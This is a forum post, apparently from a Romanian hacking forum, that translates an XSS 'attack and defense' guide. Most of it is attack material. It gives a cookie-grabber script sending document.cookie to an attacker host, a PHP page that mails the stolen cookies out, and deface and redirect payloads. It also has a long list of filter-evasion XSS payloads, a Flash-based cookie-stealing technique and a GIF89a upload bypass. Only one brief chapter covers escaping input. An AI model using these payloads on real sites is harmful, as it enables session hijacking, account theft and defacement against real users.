Jump to content
CODEX

[RO 90%] Despre XSS

Recommended Posts

Posted

? ________________________________________________________

|

| Cross Site Scripting - Attack and Defense guide

|________________________________________________________

By Xylitol . Tradus de CODEX in limba Romana pentru www.rstcenter.com

INDEX :

1. Ce est un XSS ?

2. Unde si de ce apare XSS ?

3. Cum facem un cookie grabber

4. Cum ne aparam de un XSS

5. Metode deface

6. Filtre

7. Flash Atack

8. XSS Upload

9. Phishing XSS

______________________________________________

| |

| .:: Capitolul 1 - Ce este un XSS ? ::. |

|______________________________________________|

In primul rand trebuie sa stim ca XSS este o vulnerabilitate ce apare la un server , site si

permite introducerea unui script pe pagina HTML de pe un server.

Un xss gasit s afiseaza intr-un textbox .

_________________________________________________

| |

| .:: Capitolul 2 - Unde si de ce apare XSS? ::. |

|_________________________________________________|

Xss apre din cauza filtrari proaste a codului sau in multe cazuri nu se filtreaza chiar deloc.

O sa iau urmatorul cod este folosit in majoritatea tutorialelor pt a semnifica XSS.

COD :

<html>

<head>

<title>Xss Vulnerabilitate</title>

</head>

<!-- html --!><!--cel mai bine e daca folositi html--!>

.....................

<form action="" method=post>

codul Dvs:</br></br> <input type="text" name="xss"></br></br>

<input type="submit" value="XSSvul"></br>

</form>

......................

<!—mai departe e scriptul --!>

<?

if(isset($xss))

{

....

//Daca exista xss atunci vom indeplini

COD : echo \'$test \';

Aici apre Xss deoarece nu se filtreaza codul.

codul este foarte slab incat nu poate filtra ca in cod sunt simboluri interzise ca : <> , / ' " etc.

________________________________________________

|

|.: Chapter 3 - Make a cookie grabbers :.

|________________________________________________|

Insereaza acest cod intr-o pagina vulnerablia

<script>

window.open("http://www.Hax0r.com/cookie.php?cookies="+document.cookie);

</script>

(www.Hax0r.com = siteul tau)

Deschideti notepad si faceti un document : cookie.php

copy/past acest cod:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<title>Error</title>

<style type="text/css">

<!--

body,td,th {

color: #FFFFFF;

}

body {

background-color: #000000;

}

-->

</style></head>

<? mail('email@example.com', 'Cookie stealed ! - thx xyli :)', $cookies); ?>

<body>

<h2>Error - Access denied for <? echo $_SERVER["REMOTE_ADDR"]; ?></h2>

</body>

</html>

_____________________________________________

| |

| .:: Chapter 4 - Securing XSS ::. |

|_____________________________________________|

FIX it:

Pentru a scapa de Vulnerabilitatile XSS folosim htmlentities:

in linea 16 inlocuim:

<body>

<span class="alerte">Search result :</span><?php echo $_POST['Vulnerability']; ?>

</body>

cu:

<body>

<span class="alerte">Search result :</span><?php

if(isset($_POST['Vulnerability'])) { echo htmlentities($_POST['Vulnerability']); } ?>

</body>

folosim htmlspecialchars() function in PHP ;)

alte functii:

htmlentities() quotes

strip_tags()

...

______________________________________________

|

| .: Chapter 5 - Metode de deface :.

|_____________________________________________|

Aici defeaceul se poate face simplu , asta nu inseamna ca ai acces la baza de date

sau ca stergi siteul ci doar inserezi o in codul HTML , cum ar fi :

Deface cu o imagine :

Haxored.png

sau un flash video

<EMBED SRC="http://hax0r.com/Haxored.swf"

redirect:

<script>window.open( "http://www.hax0r.com/Haxored.html" )</script>

deasemena vdeti si:

<meta http-equiv="refresh" content="0; url=http://hax0r.com/Haxored.html" />

_______________________________________________

|

| .: Chapter 6 - Filtre si scripturi nefiltrate ::.

|___ _________________________________________

<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;

URL=http://;URL=javascript:alert('XSS');\">

<META HTTP-EQUIV=\"refresh\"

CONTENT=\"0;url=javascript:alert('XSS');\">

'">><marquee><h1>XSS</h1></marquee>

'">><script>alert('XSS')</script>

'>><marquee><h1>XSS</h1></marquee>

"><script alert(String.fromCharCode(88,83,83))</script>

<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>

<div

style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCo

de(88,83,83));'))">

window.alert("Xyli !");

"/></a></><img src=1.gif onerror=alert(1)>

mouse over

<body onLoad="alert('XSS');"

<body onunload="javascript:alert('XSS');">

click me

<script language="JavaScript">alert('XSS')</script>

'); alert('XSS

<font style='color:expression(alert(document.cookie))'>

<IMG DYNSRC=\"javascript:alert('XSS')\">

<IMG LOWSRC=\"javascript:alert('XSS')\">

</textarea><script>alert(/xss/)</script>

</title><script>alert(/xss/)</script>

<script src=http://yoursite.com/your_files.js></script>

"><script>alert(0)</script>

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=\"jav ascript:alert('XSS');\">

<IMG SRC=\"jav ascript:alert('XSS');\">

<IMG SRC=\"jav ascript:alert('XSS');\">

<marquee><script>alert('XSS')</script></marquee>

<? echo('<scr)';

echo('ipt>alert(\"XSS\")</script>'); ?>

<IMG SRC=\"jav ascript:alert('XSS');\">

<IMG SRC=\"jav ascript:alert('XSS');\">

<marquee><script>alert('XSS')</script></marquee>

<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>

<img src=foo.png onerror=alert(/xssed/) />

<script>alert(String.fromCharCode(88,83,83))</script>

<scr<script>ipt>alert('XSS');</scr</script>ipt>

<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+

escape(document.cookie)</script>

<script src="http://www.evilsite.org/cookiegrabber.php"></script>

<script>alert('XSS');</script>

<script>alert(1);</script>

aici sunt doar o parte mai multe gasiti pe google.

_____________________________________________

|

| .: Chapter 7 - Flash attack :.

|_____________________________________________|

Flash is used for complex animations, simulations,

*creation of games etc..

What’s interesting for us is the getURL() action.

This function allows us to redirect the end user to another page.

its syntax is built as follows:

getURL(url:String, [window: String,[method:String]])

exemple:

getURL("http://victime.com/login.php?logout=true","_self");

url: indicate the URL of the site

window: specify within which framework the request must take place (_self, _blank…)

method: method of request GET or POST (by defect GET)

here the handling of the actionscript and the Javascript to post a alert:

getURL("javascript:alert('XSS'");

in 2002 one will show the danger of this facility,

one could for example post the cookie of visitors in this manner:

getURL("javascript:alert(document.cookie)")

in December 2005, a new alternative and appeared

consisting has to benefit from a nonpermanent fault XSS

and possibility of putting a file flash in its signature to give a permanent XSS,

moreover the author of this alternative used this technique in order

to infect MySpace with a deviated worms xss of Samy: Samy Reloaded

cookie stealer in flash ?

not but there is technique to do it

exemple

in a flash file:

GetURL("http://www.victime.com/page.php?var=<script src='http://www.hax0r.com/Haxored.js'></script>","_self");

and in Haxored.js:

document.location="http://hax0r.com/cookiestealer.php?cookie="+document.cookie;

For secure it simple solution: do not allow flash files in your web app

_____________________________________________

|

| .: Chapter 8 - XSS upload :.

|______________________________________________|

Facet Haxored.gif in paint spre exemplu

Dupa ce ati deschis Haxored.GIF in notepad

Dati delete la to si inserati asta:

GIF89a<script>alert("XSS")</script>

Salvati si inchideti-o

upload Haxored.gif intr-un free image hosting

si apare XSS...

* In mozilla nu va apare eroarea , pentru a vedea eroarea folositi IE

De ce adaugam GIF89a ?

well some upload like this one, check that the 'GIF89a' code

is contained in the image as in any .GIF respective.

the vulnerability of this upload results from the checking 'GIF89a' code

for confirmation but of nothing the possible malicious codes contained in this image.

GIF89a<script src="http://hax0r.com/cookiegrabber.php"></script>

to know the code for another image format,

it is just enough to open an image jpg or other with a text editor,

for example a png file: ‰PNG

PNG = ‰PNG

GIF = GIF89a

JPG =

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...